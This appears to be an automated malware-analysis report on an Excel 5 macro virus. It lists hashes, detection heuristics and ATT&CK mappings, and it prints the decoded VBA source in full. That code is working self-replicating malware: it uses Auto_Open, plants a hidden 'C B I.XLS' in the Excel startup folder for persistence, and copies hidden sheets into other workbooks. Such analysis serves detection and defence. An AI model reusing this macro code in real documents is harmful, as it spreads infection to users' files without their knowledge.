Xls.Trojan.Manalo-3 — Office (OLE) malware analysis

Static analysis result for SHA-256 0af1a9af5046d8aa…

MALICIOUS

Office (OLE)

279.5 KB Created: 1999-10-21 11:15:16 First seen: 2012-06-14
MD5: 8bfa2763930e9356c1494a0e30753f23 SHA-1: b2d8de51de51455cdf8258483e8c687826542400 SHA-256: 0af1a9af5046d8aac6323566dc0051a0221beaed8e24a5537badbaebdef6c1c6
240 Risk Score

Malware Insights

Xls.Trojan.Manalo-3 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel 5 macro virus, identified as Xls.Trojan.Manalo-3 by ClamAV, uses an Auto_Open macro to execute. The script attempts to copy itself and other sheets into a new workbook, saving it as 'C B I.XLS' in the Excel startup path, thereby establishing persistence. The embedded text 'manalo-e' and the ClamAV detection name further support the family attribution.

Heuristics 4

  • ClamAV: Xls.Trojan.Manalo-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Manalo-3
  • Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS
    Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13263 bytes
SHA-256: 31cadf8e5cba74200e98976ae73bb90d01cb94377206447a968a45db6ae3a0a7
Detection
ClamAV: Xls.Trojan.Manalo-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Life_Blood"


















'
' INC v1.0
'



Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
        Application.OnSheetActivate = "Jacob"

End Sub

Sub Jacob()
Attribute Jacob.VB_ProcData.VB_Invoke_Func = " \n14"
        
Startup$ = Application.StartupPath
File$ = Dir(Startup$ & "\" & "C B I.XLS")

If File$ <> "C B I.XLS" Then GoTo FileDoesNotExist Else GoTo InfectOpenFile

FileDoesNotExist:
            
   Infected$ = ActiveWorkbook.Name
   
   Application.ScreenUpdating = False

   Set newBook = Workbooks.Add
    With newBook
        .Title = ""
        .Subject = ""
    End With
   
   NewWorkbook$ = ActiveWorkbook.Name
   Sheet$ = Workbooks(NewWorkbook$).Sheets(1).Name
        
   If Sheet$ <> "Life_Blood" _
      Then
        Workbooks(Infected$).Sheets("INC").Copy Before:=Workbooks(NewWorkbook$).Sheets(1)
        Workbooks(Infected$).Sheets("Life_Blood").Copy Before:=Workbooks(NewWorkbook$).Sheets("INC")
        Workbooks(NewWorkbook$).Sheets("Life_Blood").Visible = False
        Workbooks(NewWorkbook$).Sheets("INC").Visible = False
      Else
   End If

   ActiveWindow.Visible = False
      
   Workbooks(NewWorkbook$).SaveAs FileName:=Application.StartupPath & "/" & "C B I.XLS"

GoTo Finish

InfectOpenFile:
        
   FileName$ = ActiveWorkbook.Name
   FirstSheet$ = Workbooks(FileName$).Sheets(1).Name
        
   Application.ScreenUpdating = False
   
   If FirstSheet$ <> "Life_Blood" _
      Then
        Workbooks("C B I.XLS").Sheets("Life_Blood").Copy Before:=Workbooks(FileName$).Sheets(1)
        Workbooks("C B I.XLS").Sheets("INC").Copy After:=Workbooks(FileName$).Sheets("Life_Blood")
        Workbooks(FileName$).Sheets("INC").Name = "85 Years"
        Workbooks("C B I.XLS").Sheets("INC").Copy Before:=Workbooks(FileName$).Sheets("85 Years")
        Workbooks(FileName$).Sheets("Life_Blood").Visible = False
        Workbooks(FileName$).Sheets("INC").Visible = False
        Workbooks(FileName$).Sheets("85 Years").Visible = False

      Else
   End If

If Format(Now(), "yy mm dd") >= "99 07 27" Then


Else: Workbooks(FileName$).Sheets("85 Years").Visible = False
End If


Finish:
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "C B I.XLS!Jacob"
End Sub


Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet16"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet17"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable
... (truncated)
ole10native_00.bin ole-package OLE Ole10Native stream: MBD00001D5F/Ole10Native 38180 bytes
SHA-256: 764d7393b19744a570246d85899ec3f9049322d7d83c9f6cf618c1008f179e74